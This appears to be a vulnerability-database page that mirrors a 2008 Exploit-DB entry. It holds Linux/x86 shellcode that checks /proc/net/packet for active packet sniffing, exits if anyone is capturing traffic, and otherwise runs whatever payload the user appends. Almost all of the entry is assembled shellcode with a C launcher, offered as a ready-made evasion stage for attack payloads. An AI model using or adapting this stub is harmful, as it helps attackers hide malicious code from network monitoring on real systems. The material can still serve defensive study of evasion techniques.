Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056963 漏洞类型
发布时间 2008-11-18 更新时间 2008-11-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13332
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 ▐▄∙ ▄  ▄▄▄ .  ▐ ▄         ∙ ▌ ▄ ·.  ▄∙ ▄▌ ▄▄▄▄▄  ▄▄▄· 
  █▌█▌■ ▀▄.▀· ∙█▌▐█ ■      ·██ ▐███■ █■██▌ ∙██   ▐█ ▀█ 
  ·██·  ▐▀▀■▄ ▐█▐▐▌  ▄█▀▄  ▐█ ▌▐▌▐█· █▌▐█▌  ▐█.■ ▄█▀▀█ 
 ■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌  ▐█▌· ▐█ ■▐▌
 ∙▀▀ ▀▀  ▀▀▀  ▀▀ █■  ▀█▄▀■ ▀▀  █■▀▀▀  ▀▀▀   ▀▀▀   ▀  ▀ 

Ho' Detector (Promiscuous mode detector shellcode) 
by XenoMuta <xenomuta[at]phreaker[dot]net>
http://xenomuta.tuxfamily.org/

This shellcode uses a stupid, yet effective method
for detecting sniffing on all interfaces in linux:
parsing /proc/net/packet, which contains libpcap's
stats and only one line (56 bytes) when not sniffing.
*/

char sc[]=
"\x66\x31\xC0"                // xor eax,eax
"\x66\x50"                    // push eax
"\x66\x68\x63\x6B\x65\x74"    // push dword 0x74656b63 ; cket
"\x66\x68\x74\x2F\x70\x61"    // push dword 0x61702f74 ; t/pa
"\x66\x68\x63\x2F\x6E\x65"    // push dword 0x656e2f63 ; c/ne
"\x66\x68\x2F\x70\x72\x6F"    // push dword 0x6f72702f ; /pro
"\xB0\x05"                    // mov al,0x5            ; open()
"\x66\x89\xE3"                // mov ebx,esp           ; /proc/net/packet
"\x66\x31\xC9"                // xor ecx,ecx           ; O_RDONLY
"\xCD\x80"                    // int 0x80
"\x66\x93"                    // xchg eax,ebx
"\x6A\x03"                    // push byte +0x3        ; read()
"\x66\x58"                    // pop eax
"\x66\x89\xE1"                // mov ecx,esp
"\x6A\x39"                    // push byte +0x39       ; at most 57 bytes
"\x66\x5A"                    // pop edx
"\xCD\x80"                    // int 0x80
"\x3C\x38"                    // cmp al,0x38           ; if only 56 bytes
"\x74\x06"                    // jz 0x40               ; there is no packet
"\x6A\x01"                    // push byte +0x1        ; capture. Proceed
"\x66\x58"                    // pop eax               ; with shellcode
"\xCD\x80"                    // int 0x80              ; else, exit()
/* 
Append your shellcode here 
*/
"\x90";

main(){(*(void (*)()) sc)();}
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s
opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp
=ISTU
-----END PGP SIGNATURE-----

// milw0rm.com [2008-11-18]